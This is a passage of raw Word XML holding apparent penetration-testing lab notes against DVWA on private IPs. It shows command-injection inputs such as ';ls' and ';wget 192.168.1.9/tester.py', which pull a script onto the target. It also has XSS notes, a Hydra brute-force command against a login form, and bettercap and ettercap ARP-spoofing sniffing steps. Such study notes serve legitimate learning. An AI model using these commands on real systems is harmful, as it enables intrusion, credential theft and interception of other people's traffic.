              <w:t>sudo service apache2 restart</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49943D7F" w14:textId="4B8EEEA0" w:rsidR="00E32A5C" w:rsidRDefault="00E32A5C" w:rsidP="009E14E3">
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&gt;sudo service apache2 stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B22D55" w14:textId="77777777" w:rsidR="00DD06AD" w:rsidRDefault="00DD06AD" w:rsidP="009E14E3"/>
          <w:p w14:paraId="7474D2EE" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="10743F49" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="35590413" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="2EDD0CE3" w14:textId="5FB9BB4B" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="001A3E77">
              <w:t>192.168.1.1</w:t>
            </w:r>
            <w:r>
              <w:t>;ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387C79AC" w14:textId="4B676F29" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3">
            <w:r>
              <w:t>OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2065E3" w14:textId="6189E5A9" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;;ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61E22F7B" w14:textId="1F40E1DC" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1725724A" w14:textId="4D4B6604" w:rsidR="00A462B6" w:rsidRDefault="00A462B6" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609578F9" w14:textId="51C812C5" w:rsidR="00442C5B" w:rsidRDefault="00442C5B" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0384F6F9" w14:textId="4A77FA64" w:rsidR="00740A03" w:rsidRDefault="00740A03" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;;ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EAF6C87" w14:textId="0AE3505C" w:rsidR="00A462B6" w:rsidRDefault="00A462B6" w:rsidP="009E14E3"/>
          <w:p w14:paraId="4D8EA0AE" w14:textId="77777777" w:rsidR="00A462B6" w:rsidRDefault="00A462B6" w:rsidP="009E14E3"/>
          <w:p w14:paraId="03CB2618" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="2CA2AD25" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1D657ECA" w14:textId="2381262F" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="42DE3672" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EE7408" w14:textId="5640E0EA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lastRenderedPageBreak/>
              <w:t>Reflected XSS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FF752E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">– </w:t>
            </w:r>
            <w:r w:rsidR="00FF752E" w:rsidRPr="00E828F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">only work with a link with malicious </w:t>
            </w:r>
            <w:r w:rsidR="00B750C7" w:rsidRPr="00E828F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>– Code injection</w:t>
            </w:r>
            <w:r w:rsidR="00267A9A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>(usually steal session and cookies)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B12326D" w14:textId="0FCF7B33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t>Stored XSS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31724E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>–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31724E" w:rsidRPr="0031724E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>script inject</w:t>
            </w:r>
            <w:r w:rsidR="00BD629B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0031724E" w:rsidRPr="0031724E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>(just visit website) – that is stored in the server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A378F2" w14:textId="01055469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t>DOM XSS</w:t>
            </w:r>
            <w:r w:rsidR="00256748">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498F429D" w14:textId="72A0DE2F" w:rsidR="00B37109" w:rsidRDefault="00B37109" w:rsidP="009E14E3"/>
          <w:p w14:paraId="2078A9B6" w14:textId="50136FAD" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="14B02168" w14:textId="43FE594A" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="0FB442CE" w14:textId="117380ED" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1725BE65" w14:textId="77777777" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1FCEC114" w14:textId="77777777" w:rsidR="00B37109" w:rsidRDefault="00B37109" w:rsidP="009E14E3"/>
          <w:p w14:paraId="158D67BE" w14:textId="78B17EDE" w:rsidR="00B37109" w:rsidRDefault="00B37109" w:rsidP="009E14E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CD1ACC7" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="009E14E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="25322A2D" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F864E0" w14:textId="160A476C" w:rsidR="009E14E3" w:rsidRDefault="00E35EAE" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Python -m SimpleHTTPServer </w:t>
            </w:r>
            <w:r w:rsidR="00F30EB2">
              <w:t>{PORT}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E42D6AB" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="14C8DE19" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1088C1D7" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6980FF23" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="3F164300" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78FD2CA3" w14:textId="29F38741" w:rsidR="009E14E3" w:rsidRDefault="000F56F7" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CSRF – Cross Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A654F7" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="0F8D60BA" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5415247A" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A252F1E" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A208C0" w14:paraId="6410F07C" w14:textId="77777777" w:rsidTr="00134A0C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="34FCDF58" w14:textId="30A7817B" w:rsidR="00A208C0" w:rsidRDefault="00A208C0" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Brute Force Attack – Using </w:t>
            </w:r>
            <w:r w:rsidRPr="00A208C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>HYDRA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B46FC3" w14:paraId="0072C714" w14:textId="77777777" w:rsidTr="00341670">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="432513BB" w14:textId="5D259AA7" w:rsidR="00B46FC3" w:rsidRDefault="00B46FC3" w:rsidP="00E15CBD">
            <w:r w:rsidRPr="00B46FC3">
              <w:t>hydra 192.168.1.75 http-form-post "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="2E1919BE" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E4BEB15" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518673E6" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="6A564138" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13FD6A0A" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD9B734" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="3C93D0AC" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A1100F3" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="495E2A91" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00751059" w14:paraId="02331C5E" w14:textId="77777777" w:rsidTr="00BE010F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="124F2B0C" w14:textId="27BC0B09" w:rsidR="00751059" w:rsidRPr="002E63C1" w:rsidRDefault="00751059" w:rsidP="00751059">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E63C1">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Man In The Middle Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63C1" w14:paraId="56CFC62A" w14:textId="77777777" w:rsidTr="00E91039">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="46521A82" w14:textId="5BE08AFA" w:rsidR="002E63C1" w:rsidRDefault="002E63C1" w:rsidP="002E63C1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="1330A494" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220C2137" w14:textId="320F69F7" w:rsidR="00F95A4D" w:rsidRDefault="00F95A4D" w:rsidP="00E15CBD">
            <w:r>
              <w:t>NOTE: Need to be ROOT USER</w:t>
            </w:r>
            <w:r w:rsidR="00ED4198">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00ED4198" w:rsidRPr="00ED4198">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>You need install bettercap in Kali</w:t>
            </w:r>
            <w:r w:rsidR="00ED4198">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AFA807" w14:textId="79E00426" w:rsidR="009E14E3" w:rsidRDefault="00C145BC" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;apt-get install betterca</w:t>
            </w:r>
            <w:r w:rsidR="007C09D9">
              <w:t>p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6052D3AF" w14:textId="57BE4C0E" w:rsidR="00CF6717" w:rsidRDefault="00CF6717" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;bettercap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1708853E" w14:textId="6EB05DB6" w:rsidR="00DF2620" w:rsidRDefault="002024AD" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;help</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F080DF8" w14:textId="51746556" w:rsidR="00DB0FFD" w:rsidRDefault="00FB0E91" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="007A6632">
              <w:t>help net.probe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7960756C" w14:textId="678F6C36" w:rsidR="00ED3085" w:rsidRDefault="00EA7332" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;net.probe on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04374224" w14:textId="63ED683E" w:rsidR="002905F3" w:rsidRDefault="002905F3" w:rsidP="00E15CBD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>&gt;help arp.spoof</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49433BC1" w14:textId="12A884CA" w:rsidR="002905F3" w:rsidRDefault="00D31553" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;set arp.spoof.fullduplex true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65FAE3B7" w14:textId="3ECC8FB2" w:rsidR="00051B30" w:rsidRDefault="00051B30" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;set arp.spoof.targets {ipaddress}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F65C9B" w14:textId="16E5CB1D" w:rsidR="0023394C" w:rsidRDefault="0023394C" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00975A32">
              <w:t>help</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08ADD641" w14:textId="29719868" w:rsidR="00975A32" w:rsidRDefault="00975A32" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;set net.sniff.local true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="682C30ED" w14:textId="6EBEFD2F" w:rsidR="00BA0749" w:rsidRDefault="00BA0749" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;arp.spoof on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3003DC4D" w14:textId="21BD48DB" w:rsidR="00BA0749" w:rsidRDefault="00BA0749" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;net.sniff on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157005A6" w14:textId="05957DE3" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="530B1301" w14:textId="117E7DFB" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="3CB3BFBB" w14:textId="56CF2F97" w:rsidR="002E62CE" w:rsidRDefault="002E62CE" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="656198B5" w14:textId="22B07C9F" w:rsidR="002E62CE" w:rsidRDefault="00F55FC5" w:rsidP="00E15CBD">
            <w:r>
              <w:t>Note: If you want to run previous – You need to create a sniff.cap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7946058E" w14:textId="7A005AE7" w:rsidR="002E62CE" w:rsidRDefault="002E62CE" w:rsidP="002E62CE">
            <w:r>
              <w:t>&gt;bettercap -iface eth0 -caplet sniff.cap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A89676E" w14:textId="3451E2AB" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="44718FB0" w14:textId="77777777" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="4DB58C2B" w14:textId="48CF3E63" w:rsidR="00DB0FFD" w:rsidRDefault="00DB0FFD" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="519943F7" w14:textId="7FD13910" w:rsidR="00DB0FFD" w:rsidRDefault="00DB0FFD" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="18870EF4" w14:textId="77777777" w:rsidR="00DB0FFD" w:rsidRDefault="00DB0FFD" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="54039D9D" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="258963D6" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="68C805BF" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="5231A72F" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="7BF22A65" w14:textId="5C916DE4" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14516F89" w14:textId="3CC79253" w:rsidR="002040D3" w:rsidRDefault="002040D3" w:rsidP="002040D3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="2E039742" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C267205" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F455DF5" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>Alternative: ETTERCAP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333257BF" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>&gt;cat /proc/sys/net/ipv4/ip_forward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5D08C3" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>Note: If its enable packet forwarding 0 or 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6525FA87" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B"/>
          <w:p w14:paraId="3A9470AB" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535AB42B" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B"/>
          <w:p w14:paraId="03EDCD14" w14:textId="4AC8B20E" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>Note: To start</w:t>
            </w:r>
            <w:r w:rsidR="007D5929">
              <w:t>, It will pop a window</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34671420" w14:textId="4ACE425A" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>&gt;Ettercap -G</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D4643D" w14:textId="2016676E" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="168AB6B0" w14:textId="628F3B9A" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="2BEE6F98" w14:textId="753BDC3A" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="147C9E40" w14:textId="0BCFB66C" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="3A96176A" w14:textId="77777777" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="79F102C1" w14:textId="59BEB335" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="3C939E35" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACE7D3E" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA78B31" w14:textId="692299E1" w:rsidR="009E14E3" w:rsidRDefault="003E1086" w:rsidP="00E15CBD">
            <w:r>
              <w:t>Can code using scapy instead of python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="02E6BCED" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06293511" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75E59089" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="2194CD0D" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68EA8BF7" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09086199" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="19432BDE" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="648B347A" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B691478" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="162D84A7" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F6A92F" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C53921" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="18A65A16" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B46B017" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11DE4FC1" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="323724D4" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40DAAF98" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="208F3D80" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
